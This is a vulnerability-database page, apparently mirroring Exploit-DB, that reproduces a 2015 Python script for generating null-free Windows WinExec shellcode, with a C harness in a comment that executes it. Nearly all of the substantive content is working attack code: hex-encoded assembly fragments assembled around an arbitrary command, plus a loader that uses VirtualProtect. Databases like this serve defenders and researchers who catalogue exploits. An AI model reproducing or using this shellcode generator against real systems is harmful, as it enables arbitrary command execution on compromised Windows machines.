Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Windows XP-10 - Null-Free WinExec Shellcode Python

🗓️ 13 Dec 2015 00:00:00Reported by B3mB4mType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 35 Views

Windows Null-Free WinExec Shellcode Python for XP-1

Code
#All Windows Null-Free WinExec Shellcode

"""
#Coded by B3mB4m
#Concat : [email protected]
#Home   : b3mb4m.blogspot.com
#10.12.2015
Tested on : 
	Windows XP/SP3 x86
	Windows 7 Ultimate x64	
	Windows 8.1 Pro Build 9600 x64
	Windows 10 Home x64
-This shellcode NOT using GetProcAddress function-
-With this python script you can create ur own shellcode-
-This script belongs to shellsploit project-
-https://github.com/b3mb4m/Shellsploit-
"""



def WinExec( command, fill=None):
	from re import findall
	fill =  "31c9b957696e45eb0431c9eb0031c"
	fill += "031db31d231ff31f6648b7b308b7f0"
	fill += "c8b7f1c8b47088b77208b3f807e0c3"
	fill += "375f289c703783c8b577801c28b7a2"
	fill += "001c789dd81f957696e45753b8b34a"
	fill += "f01c645390e75f68b7a2401c7668b2"
	fill += "c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd"
	if len(command) == 4:
		stack = "%s" % (command.encode('hex'))
		data = findall("..?", stack)
		fill += "68"+"".join(data)
	else:
		if len(command)%4 == 3:
			padd = "\x20"
		elif len(command)%4 == 2:
			padd = "\x20"*2
		elif len(command)%4 == 1:
			padd = "\x20"*3
		else:
			padd = ""
		command = command + padd
		fixmesempai = findall('....?', command)
		for x in fixmesempai[::-1]:
			first = str(x[::-1].encode("hex"))
			second = findall("..?", first)[::-1]
			fill += "68"+"".join(second)
	fill += "89e2415152ffd7e886ffffff8b34af0"
	fill += "1c645813e4578697475f2817e045072"
	fill += "6f6375e98b7a2401c7668b2c6f8b7a1c"
	fill += "01c78b7caffc01c731c951ffd7"
	
	from random import randint
	name = str(randint(99999,99999999))+".txt"
	with open(name, "w") as exploit:
		exploit.write("\\x"+"\\x".join(findall("..?", fill)))
		exploit.close()

	print "\n\nLength : %s" % len(findall("..?", fill))
	print "File : %s\n" % name
	print "\n\\x"+"\\x".join(findall("..?", fill))


if __name__ == '__main__':
	from sys import argv
	if len(argv) < 2:
		print "\nUsage : python exploit.py 'command'\n"
	else:
		WinExec(argv[1])



"""
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
 
//gcc shell.c -o shell.exe
 
int main(void){
	char *shellcode = "SHELLCODE";
  	DWORD mypage;
  	BOOL ret = VirtualProtect (shellcode, strlen(shellcode),
    	PAGE_EXECUTE_READWRITE, &mypage);
 
  	if (!ret) {
    	printf ("VirtualProtect Failed ..\n");
    	return EXIT_FAILURE;}
  	printf("strlen(shellcode)=%d\n", strlen(shellcode));
  	((void (*)(void))shellcode)();
}
"""

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Dec 2015 00:00Current
0.1Low risk
Vulners AI Score0.1
windowsshellcodepythonxp-10winexec
35